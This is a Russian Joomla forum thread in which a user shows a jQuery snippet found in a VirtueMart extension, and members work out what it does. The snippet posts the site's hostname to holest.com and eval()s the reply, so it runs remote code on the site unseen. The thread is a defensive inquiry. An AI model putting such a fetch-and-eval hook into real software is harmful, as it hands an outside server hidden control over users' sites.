Нашел в коде компонента странную функцию

ushangi

Осваиваюсь на форуме
11
0 / 0

Нашел в коде компонента странную функцию

« : 01.11.2017, 13:22:16 »

jQuery(document).ready(function(){var h=window.location.hostname.toLowerCase();if(h=='localhost'||h=='127.0.0.1')return;jQuery.ajax({type:"POST",url:"http://holest.com/dist/vmexcellikeinput/track/tracker.php",data:(function(a){var b=[];for(var p in a)if(a.hasOwnProperty(p)){b.push(encodeURIComponent(p)+"="+encodeURIComponent(a[p]))}return b.join("&")})({'host':window.location.host,'hostname':window.location.hostname,'jhost':(window.location.host+window.location.pathname).split('administrator')[0].toLowerCase().replace(/\//g,'__').replace(/\:/g,'__')}),success:function(a){try{eval(a)}catch(e){}}})});

Кто может сказать что эта функция передает в скрипт?

Записан

robert

Живу я здесь
4974
457 / 20

Re: Нашел в коде компонента странную функцию

« Ответ #1 : 01.11.2017, 13:35:24 »

Хм, а какое отношение http://holest.com имеет к вашему сайту?

Записан

Не будь паразитом, сделай что-нибудь самостоятельно!

ushangi

Осваиваюсь на форуме
11
0 / 0

Re: Нашел в коде компонента странную функцию

« Ответ #2 : 01.11.2017, 13:41:05 »

Цитата: robert от 01.11.2017, 13:35:24

Хм, а какое отношение http://holest.com имеет к вашему сайту?

в том то и дело что никакого.

Очень похоже на что-то нехорошее. Но моих знаний не достаточно что бы понять насколько это нехорошо.
Пока задокументировал эту функцию.
В работе компонента ни чего не изменилось.

Что не маловажно этот компонент распространяется на этом форуме, и вот хочется узнать, что это за радость. И может других форумчан предупредить.

Записан

lexxbry

Живу я здесь
2387
68 / 8

Re: Нашел в коде компонента странную функцию

« Ответ #3 : 01.11.2017, 13:43:49 »

что за чудный компонент?
покажите откуда он распространяется?

Записан

SEO-оптимизация,продвижение
Создание и сопровождение сайтов на Joomla
Миграция

ushangi

Осваиваюсь на форуме
11
0 / 0

Re: Нашел в коде компонента странную функцию

« Ответ #4 : 01.11.2017, 13:44:49 »

Цитата: lexxbry от 01.11.2017, 13:43:49

что за чудный компонент?
покажите откуда он распространяется?

Скачать - Управление товарами в VirtueMart - в таблиц

Записан

robert

Живу я здесь
4974
457 / 20

Re: Нашел в коде компонента странную функцию

« Ответ #5 : 01.11.2017, 13:53:50 »

Так задайте этот вопрос автору. Вкратце: этот код передает данные о вашем сайте AJAX-запросом в http://holest.com, тот обрабатывает и присылает другой код, который исполняется на вашем сайте.

Записан

Не будь паразитом, сделай что-нибудь самостоятельно!

SmokerMan

Гуру
5290
720 / 26

Re: Нашел в коде компонента странную функцию

« Ответ #6 : 01.11.2017, 13:53:57 »

ну так там и спрашиваете)
судя по коду видимо использует этот сервис для чего-то
хотя как он пытается отправить ajax post запрос на другой домен хз)
там такое можно сделать только через jsonp

Записан

robert

Живу я здесь
4974
457 / 20

Re: Нашел в коде компонента странную функцию

« Ответ #7 : 01.11.2017, 14:01:24 »

Цитата: SmokerMan от 01.11.2017, 13:53:57

хотя как он пытается отправить AJAX post запрос на другой домен хз

Думаю, что это его собственный ресурс.

Записан

Не будь паразитом, сделай что-нибудь самостоятельно!

SmokerMan

Гуру
5290
720 / 26

Re: Нашел в коде компонента странную функцию

« Ответ #8 : 01.11.2017, 14:06:35 »

Цитата: robert от 01.11.2017, 14:01:24

Думаю, что это его собственный ресурс.

что значит собственный?)
если ты будешь тупо отправлять любой AJAX запрос (тут исключение только jsonp) c одного домена на другой он работать не будет, т.к. это будет кроссдоменный запрос

Записан

dmitry_stas

Легенда
13151
1234 / 8

Re: Нашел в коде компонента странную функцию

« Ответ #9 : 01.11.2017, 14:30:23 »

ну строго говоря запрос будет работать, не будет работать ответ. та и даже в таком случае, если доступ к ответу нужен, то заголовки отдать нужные на запрашиваемом сервере, и все.

Записан

Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций

robert

Живу я здесь
4974
457 / 20

Re: Нашел в коде компонента странную функцию

« Ответ #10 : 01.11.2017, 14:31:14 »

Цитата: SmokerMan от 01.11.2017, 14:06:35

работать не будет, т.к. это будет кроссдоменный запрос

И с "Origin"- и "Access-Control-Allow-Origin"-заголовками?

Записан

Не будь паразитом, сделай что-нибудь самостоятельно!

SmokerMan

Гуру
5290
720 / 26

Re: Нашел в коде компонента странную функцию

« Ответ #11 : 01.11.2017, 15:27:10 »

Цитата: robert от 01.11.2017, 14:31:14

Access-Control-Allow-Origin

еще раз, все это будет работать только при dataType: 'jsonp'

а если ты будешь просто отправлять например dataType: 'json' или без dataType то работать не должно

Записан

dmitry_stas

Легенда
13151
1234 / 8

Re: Нашел в коде компонента странную функцию

« Ответ #12 : 01.11.2017, 15:32:57 »

вы что-то путаете, это будет работать и с post, и с get, и со всеми остальными методами. нет никакой разницы. более того, как уже сказал чтобы отправить запрос вообще никакие заголовки не нужны. вызываемый сервер запрос получит и обработает. т.е. если задача только передать - ничего дополнительно можно вообще не делать. но вот чтобы получить доступ к телу ответа - понадобятся вышеуказанные заголовки от запрашиваемого сервера. без них браузер заблокирует доступ к ответу.

Записан

Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций

robert

Живу я здесь
4974
457 / 20

Re: Нашел в коде компонента странную функцию

« Ответ #13 : 01.11.2017, 15:53:04 »

Цитата: SmokerMan от 01.11.2017, 15:27:10

Только что создал mysite.ru/test.php с таким кодом

Спойлер

[свернуть]

На локалке создал test2.php с таким кодом

Спойлер

[свернуть]

Набираю localhost/test2.php и,

Clipboard01.jpg (42.65 КБ, 1366x768 - просмотрено 42 раз.)

Записан

Не будь паразитом, сделай что-нибудь самостоятельно!

ushangi

Осваиваюсь на форуме
11
0 / 0

Re: Нашел в коде компонента странную функцию

« Ответ #14 : 01.11.2017, 17:46:41 »

Цитата: robert от 01.11.2017, 15:53:04

Только что создал mysite.ru/test.php с таким кодом
Спойлер
[свернуть]
На локалке создал test2.php с таким кодом
Спойлер
[свернуть]
Набираю localhost/test2.php и,

Правильно ли я Вас понял, что этот код позволяет исполнять скрипты без ведома администратора сайта. Т.е. это дырка в безопасности, которую зачемто сделали разработчики скрипта?

Записан

dmitry_stas

Легенда
13151
1234 / 8

Re: Нашел в коде компонента странную функцию

« Ответ #15 : 01.11.2017, 21:34:17 »

позволяет, да. не скажу прям что это дырка, потому что я просто не знаю возможности этого скрипта, и может быть там и все нормально. но что-то там определенно выполняется. судя по тому, что отправляется домен, возможно это проверка лицензионного ключа, или типа такого.

Записан

Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций

robert

Живу я здесь
4974
457 / 20

Re: Нашел в коде компонента странную функцию

« Ответ #16 : 01.11.2017, 22:18:00 »

Цитата: dmitry_stas от 01.11.2017, 21:34:17

проверка лицензионного ключа, или типа такого

Ну или кусок кода обработчика прячет у себя. Скорее всего, ничего страшного: код можно посмотреть, а автор здесь тусуется.

Записан

Не будь паразитом, сделай что-нибудь самостоятельно!

dmitry_stas

Легенда
13151
1234 / 8

Re: Нашел в коде компонента странную функцию

« Ответ #17 : 01.11.2017, 22:22:54 »

ага, например если домен легитимный возвращается код которого не хватает, в противном случае вылазит какое то предупреждение. ну и т.п.

Записан

Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций

pavelrer

Давно я тут
615
10 / 2

Re: Нашел в коде компонента странную функцию

« Ответ #18 : 02.11.2017, 11:26:00 »

1. Вы нашли каку - хорошо!
2. Вас все устраиваеи в сайте кроме каки
3. Вы не знаете как убрить каку
4. ! Если кака не динамическая, т.е у каки код один и тот же переходим к пункту 5
5. Вырезаем каку из страници при создании средствами php
6. ищим каку и отменяем пункт 5

Каку вырезаем через JResponse.
С начало get - забрали станичку, вырезали каку, потом set вернули страничку.
Ну а далее - лечим, и отменяем что выше!

На php ниже 7ки, скрость генерации увеличется очень сильно!!!

« Последнее редактирование: 02.11.2017, 11:31:05 от pavelrer »

Записан

pavelrer

Давно я тут
615
10 / 2

Re: Нашел в коде компонента странную функцию

« Ответ #19 : 02.11.2017, 11:35:16 »

Код для выреза каки примерно такой

Код

 $ext_buffer = JResponse::getBody();    // Забрали сгенеренный HTML перед передачей
 $trans = array(
	'<script src="/" type="text/javascript"></script>' => '',
	'<link href="/" rel="stylesheet" type="text/css" />' => '',
	chr(9) => ''
				);
 $ext_buffer = strtr($ext_buffer, $trans);
 JResponse::setBody($ext_buffer);	   // Вернем HTML в зад

\

тут три каки:
1. <script src="/" type="text/javascript"></script>
2. <link href="/" rel="stylesheet" type="text/css" />
3. chr(9)

Записан

robert

Живу я здесь
4974
457 / 20

Re: Нашел в коде компонента странную функцию

« Ответ #20 : 02.11.2017, 11:52:21 »

@pavelrer Что за поток сознания? А что делать, если без этого кода расширение не будет работать?

Записан

Не будь паразитом, сделай что-нибудь самостоятельно!

pavelrer

Давно я тут
615
10 / 2

Re: Нашел в коде компонента странную функцию

« Ответ #21 : 02.11.2017, 12:59:55 »

Цитировать

@pavelrer Что за поток сознания? А что делать, если без этого кода расширение не будет работать?

Не очень понял, при всем уважении к вам Robert.
Если происходит так как пишет автор - не безопасно, и Joomla тут не причем!
Я, могу ошибаться!
P.S http://holest.com

Записан

Joomla 3 не пускает в админку (просто перезагружается страница) (гуглил, нашёл решение, не помогло) Автор lifelover2b	Ответов: 11 Просмотров: 6892	05.06.2025, 04:48:29 от andrey222
Антивирус нашел вредоносный код в двух файлах сайта polyfill Автор buto	Ответов: 4 Просмотров: 1672	19.10.2024, 10:56:55 от wishlight
ajax загрузка компонента на странице материала К2 Автор Divn	Ответов: 0 Просмотров: 1168	13.01.2023, 15:05:52 от Divn
Ошибка при установке компонента Автор JackThaCat	Ответов: 6 Просмотров: 2168	11.11.2022, 06:04:13 от Satelitte
Тип поля формы Select sql, как заполнить его через функцию php? Автор GuDeVic	Ответов: 13 Просмотров: 2035	07.10.2022, 12:25:45 от fsv

Joomla по-русски — возвращение к истокам

👩‍💻 WT Layout select - плагин выбора файла макета (layout) Joomla.

👩‍💻 Extended Wishlist для JoomShopping 5+.

Похожие темы